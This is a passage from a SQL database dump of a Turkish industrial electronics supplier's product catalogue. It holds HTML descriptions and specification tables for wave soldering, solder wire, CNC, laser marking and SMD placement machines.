sistemi</li>\r\n<li>M&uuml;kemmel doğruluk ve tekrar edilebilirlik sağlayan gelişmiş teknoloji</li>\r\n<li>Tek veya &ccedil;ift dalga se&ccedil;ilebilir</li>\r\n<li>Kurşunlu veya kurşunsuz &uuml;retime uygun se&ccedil;ilebilir</li>\r\n<li>Kolay kullanım ve bakım</li>\r\n<li>Nitrojen opsiyonu</li>\r\n</ul>\r\n<p><span ></span></p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td >MODEL ADI</td>\r\n<td >SPARTAN 8S</td>\r\n<td>SPARTAN 8D</td>\r\n</tr>\r\n<tr>\r\n<td>Kontrol Sistemi</td>\r\n<td >Novastar Bilgisayar Sistemi</td>\r\n<td>Novastar Bilgisayar Sistemi</td>\r\n</tr>\r\n<tr>\r\n<td>Dalga Genişliği</td>\r\n<td >203mm</td>\r\n<td>203mm</td>\r\n</tr>\r\n<tr>\r\n<td >Dalga Y&uuml;ksekliği</td>\r\n<td >0-10mm</td>\r\n<td >0-10mm</td>\r\n</tr>\r\n<tr>\r\n<td >Konvey&ouml;r Hızı</td>\r\n<td>2000mm/dakika</td>\r\n<td>2000mm/dakika</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;nısıtıcı Maks. Sıc. ve G&uuml;c&uuml;</td>\r\n<td>150&ordm;C / 3.75kW</td>\r\n<td>150&ordm;C / 3.75kW</td>\r\n</tr>\r\n<tr>\r\n<td >Lehim Pota Kapasitesi</td>\r\n<td >57kg</td>\r\n<td >136kg</td>\r\n</tr>\r\n<tr>\r\n<td >Pota Maks. Sıcaklığı</td>\r\n<td>300&ordm;C</td>\r\n<td >300&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td >Pota Maks. Sıcaklığı (Kurşunsuz)</td>\r\n<td >350&ordm;C</td>\r\n<td >350&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maksimum G&uuml;c&uuml;</td>\r\n<td >2.5kW</td>\r\n<td >3.2kW</td>\r\n</tr>\r\n<tr>\r\n<td>K&ouml;p&uuml;k Flux Tankı</td>\r\n<td >2 lt</td>\r\n<td >2 lt</td>\r\n</tr>\r\n<tr>\r\n<td >G&uuml;&ccedil; Kaynağı</td>\r\n<td>1 Faz 220VAC&nbsp;</td>\r\n<td >1 Faz 220VAC&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','Spartan 8S/8D','','','','spartan-8s-8d-44'),(48,'Sn63Pb37 Tel Lehim - 0.4mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','245-Sn63Pb37-0.4mm','','','','245-sn63pb37-0.4mm-29'),(49,'Sn63Pb37 Tel Lehim - 0.6mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','245-Sn63Pb37-0.6mm','','','','245-sn63pb37-0.6mm'),(50,'Kurşunsuz Tel Lehim - 1mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','275-K100-1mm','','','','275-k100-1mm-28'),(51,'Ekonomik CNC Makinesi\r\n750x750mm boyutlarında','<h2>Eko Serisi CNC</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Model: 3S-CNC-01-750x750</li>\r\n<li style=\"text-align: left;\">Boyutlar: 750x750mm</li>\r\n<li style=\"text-align: left;\">&Ccedil;alışma Alanı: 550x520x122mm</li>\r\n<li style=\"text-align: left;\">Eksen Sayısı: 4 (X,Y1,Y2,Z)</li>\r\n<li style=\"text-align: left;\">Spindle: 1.5kW 220VAC Hava-Soğutmalı (24,000 rpm)</li>\r\n<li style=\"text-align: left;\">İnvert&ouml;r: PI kontrol, RS485, Mono-faze veya Trifaze</li>\r\n<li style=\"text-align: left;\">Bilgisayar: Raspberry</li>\r\n<li style=\"text-align: left;\">İşletim sistemi: Linux</li>\r\n<li style=\"text-align: left;\">Monit&ouml;r: 17\" LCD Ekran</li>\r\n<li style=\"text-align: left;\">Klavye, Fare: Dahil</li>\r\n<li style=\"text-align: left;\">Menşei: T&uuml;rkiye</li>\r\n<li style=\"text-align: left;\">&Uuml;retici: 3S Teknolojileri</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<h2>Uygulamalar</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Prototip PCB Kazıma (tek taraflı / &ccedil;ift taraflı)</li>\r\n<li style=\"text-align: left;\">Ahşap İşleme</li>\r\n<li style=\"text-align: left;\">Polikarbon / Akrilik Kesme</li>\r\n<li style=\"text-align: left;\">Aluminyum kesme / delme</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col span=\"6\" /> </colgroup>\r\n<tbody>\r\n<tr style=\"line-height: 200%; background-color: #d22060; color: #ffffff;\">\r\n<td style=\"text-align: center;\">&nbsp; Model&nbsp; &nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-Genişlik&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-&Ccedil;alışma Alanı&nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Genişlik&nbsp; &nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Genişlik&nbsp; &nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Z-&Ccedil;alışma Alanı&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"line-height: 150%;\">\r\n<td style=\"text-align: center;\">750x750</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">550mm</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">520mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr style=\"line-height: 150%; background-color: #d07193; color: #ffffff;\">\r\n<td style=\"text-align: center;\">1000x1000</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">800mm</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">770mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr style=\"line-height: 150%;\">\r\n<td style=\"text-align: center;\">1500x1500</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1300mm</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1270mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n</tbody>\r\n</table>','3S-CNC-01-750x750','','','','3s-cnc-01-750x750'),(52,'Ekonomik CNC Makinesi\r\n1500x1500mm boyutlarında','<h2>Eko Serisi CNC</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Model: 3S-CNC-01-1500x1500</li>\r\n<li style=\"text-align: left;\">Boyutlar: 1500x1500mm</li>\r\n<li style=\"text-align: left;\">&Ccedil;alışma Alanı: 1300x1270x122mm</li>\r\n<li style=\"text-align: left;\">Eksen Sayısı: 4 (X,Y1,Y2,Z)</li>\r\n<li style=\"text-align: left;\">Spindle: 1.5kW 220VAC Hava-Soğutmalı (24,000 rpm)</li>\r\n<li style=\"text-align: left;\">İnvert&ouml;r: PI kontrol, RS485, Mono-faze veya Trifaze</li>\r\n<li style=\"text-align: left;\">Bilgisayar: Raspberry</li>\r\n<li style=\"text-align: left;\">İşletim sistemi: Linux</li>\r\n<li style=\"text-align: left;\">Monit&ouml;r: 17\" LCD Ekran</li>\r\n<li style=\"text-align: left;\">Klavye, Fare: Dahil</li>\r\n<li style=\"text-align: left;\">Menşei: T&uuml;rkiye</li>\r\n<li style=\"text-align: left;\">&Uuml;retici: 3S Teknolojileri</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<h2>Uygulamalar</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">Prototip PCB Kazıma (tek taraflı / &ccedil;ift taraflı)</li>\r\n<li style=\"text-align: left;\">Ahşap İşleme</li>\r\n<li style=\"text-align: left;\">Polikarbon / Akrilik Kesme</li>\r\n<li style=\"text-align: left;\">Aluminyum kesme / delme</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col span=\"6\" /> </colgroup>\r\n<tbody>\r\n<tr style=\"line-height: 200%; background-color: #d22060; color: #ffffff;\">\r\n<td style=\"text-align: center;\">&nbsp; Model&nbsp; &nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-Genişlik&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; X-&Ccedil;alışma Alanı&nbsp;&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Genişlik&nbsp; &nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Y-Genişlik&nbsp; &nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp; Z-&Ccedil;alışma Alanı&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"line-height: 150%;\">\r\n<td style=\"text-align: center;\">750x750</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">550mm</td>\r\n<td style=\"text-align: center;\">750mm</td>\r\n<td style=\"text-align: center;\">520mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr style=\"line-height: 150%; background-color: #d07193; color: #ffffff;\">\r\n<td style=\"text-align: center;\">1000x1000</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">800mm</td>\r\n<td style=\"text-align: center;\">1000mm</td>\r\n<td style=\"text-align: center;\">770mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n<tr style=\"line-height: 150%;\">\r\n<td style=\"text-align: center;\">1500x1500</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1300mm</td>\r\n<td style=\"text-align: center;\">1500mm</td>\r\n<td style=\"text-align: center;\">1270mm</td>\r\n<td style=\"text-align: center;\">122mm</td>\r\n</tr>\r\n</tbody>\r\n</table>','3S-CNC-01-1500x1500','','','','3s-cnc-01-1500x1500'),(53,'Lazer Markalama Makinesi','<h2 style=\"text-align: left;\">Panasonic Lazer Markalama Makinesi</h2>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li style=\"text-align: left;\">\r\n<p>Lazer Markalama Makinesi</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Yüksek Hızlı (3000 mm/s)</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Full otomatik ve inline</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>Min. 0.1 x 0.1mm karakter boyutu</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>2D barkod basma kabiliyeti</p>\r\n</li>\r\n</ul>\r\n<p style=\"text-align: left;\"> </p>\r\n<table id=\"zebra-blue\" style=\"margin-left: 30px; border: 0px solid #00b8ff; border-color: 1c09aa; border-width: 0px;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"text-align: left;\">\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">PCB Boyutları</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">L 50mm xW50mm - L510mm x W460mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">PCB Ağırlığı</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Maks. 3 kg</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">PCB Kalınlığı</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">0..3 - 8mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">PCB Değiştirme süresi</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Maks. 4 sn</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Makine ağırlığı</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">540 kg (Ana gövde), 31kg (Duman emici)</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">&lt;span \"&gt;Makine boyutları</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">G912mm x D1772mm x Y1487mm (duman emici @ arka)</div>\r\n<div style=\"text-align: left;\">G1422mm x D1545mm x Y1487 (duman emici @ yan)</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\"> </td>\r\n<td style=\"text-align: left;\"> </td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Markalama alanı</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">55mm x 55mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Karakter Genişlik / Yükseklik</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">0.1mm - 55m2</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Min. Hücre Boyutu</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Min. 0.1mm x 0.1mm</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Markalama Hızı</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Maks. 3000mm/s</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Karakter Tipleri</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">İngilizce karakterler ve sayılar</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">Barkod Tipleri</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">CODE39, CODE128, ITF, NW-7, JAN (EAN) / UPC</div>\r\n</td>\r\n</tr>\r\n<tr style=\"text-align: left;\">\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">2D barkod Tipleri</div>\r\n</td>\r\n<td style=\"text-align: left;\">\r\n<div style=\"text-align: left;\">QR Code, Micro QR Code, iQR Code, Data Matrix, GS1 Data Matrix</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','LPS-C','','','','lps-c'),(61,'Maks 92,000cph / Moduler / Tek veya çift lane / Çift kafa','<h2><span style=\"text-align: left;\">PANASONIC SMD Dizgi Makinesi (Ultra-Hızlı)</span></h2>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 92,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">16, 8 veya 2 nozzle ile kafa seçenekleri</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Çift gantry kafa sistemi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Tek konveyör veya çift konveyör mode\'ları</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 510 x 590mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.037mm dizgi hassasiyeti</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">03015 ile 100x90mm arası malzemelerin dizgisi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feederler + Tray Ünitesi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Gelişmiş MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modüler ve esnek</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Hızlı ürün dönüşümü</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\"> </p>\r\n<table id=\"zebra-blue\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td colspan=\"3\">\r\n<p style=\"text-align: center;\">NPM-D3A / NM-EJM6E</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Kafa</p>\r\n</td>\r\n<td style=\"text-align: 